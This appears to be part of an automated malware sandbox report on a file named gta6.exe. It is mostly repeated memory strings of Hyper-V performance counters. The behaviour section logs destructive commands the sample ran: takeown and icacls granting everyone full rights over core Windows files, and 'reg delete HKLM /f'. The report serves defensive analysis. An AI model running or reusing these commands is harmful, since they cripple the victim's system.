Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593392547.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: reg.exe, 00000020.00000003.1616205398.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611881262.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612272320.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615968093.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervis
Source: reg.exe, 00000020.00000003.1593238842.0000024D350F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec487
Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593392547.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612618239.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616503260.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1641852190.0000024D350CF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594439512.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1597565960.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607595828.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598748911.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599138962.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599859371.0000024D350C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisor
Source: reg.exe, 00000020.00000003.1583159282.0000024D35889000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: amd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_none_40a51070cee1599d]^
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor;l-
Source: reg.exe, 00000020.00000003.1594895808.0000024D35106000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594776251.0000024D350D2000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594703951.0000024D3510D000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594199326.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594918365.0000024D3510B000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594293310.0000024D350F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partitionui
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service)
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V jvtjinaerjcnmkc Bus"
Source: reg.exe, 00000020.00000003.1601148051.0000024D350D1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615644990.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844
Source: reg.exe, 00000020.00000003.1615327515.0000024D357C0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611343119.0000024D357C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: redictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: reg.exe, 00000020.00000003.1616146655.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615490327.0000024D3578A000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611988960.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611486893.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615758985.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611751619.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611684206.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615691839.0000024D357B1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616057154.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch P
Source: reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Count
Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4788Hyper-V Hypervisor4790Logical`
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V jvtjinaerjcnmkc Bus Pipes
Source: reg.exe, 00000020.00000003.1615208152.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: er Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Resets/sec5084Page Table Validations/sec5086APIC TPR Accesses/sec5088Page Table Write Intercepts/sec5090Synthetic Interrupts/sec5092Virtual Interrupts/sec5094APIC IPIs Sent/sec5096APIC Self IPIs Sent/sec5098GPA Space Hypercalls/sec5100Logical Processor Hypercall
Source: icacls.exe, 0000001E.00000003.1309867549.0000024753958000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmci.sys`
Source: reg.exe, 00000020.00000003.1601112480.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601008694.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1600728861.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601291746.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601421314.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshotval.
Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pervisorStartupCost4906Hyper-V Hyp
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary, 0_2_000000014000D9C4
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000C4D0 RtlRemoveVectoredExceptionHandler,RtlAddVectoredExceptionHandler, 0_2_000000014000C4D0
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014001F888 RtlAddVectoredExceptionHandler, 0_2_000000014001F888
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\gta6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C: Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete HKLM /f Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
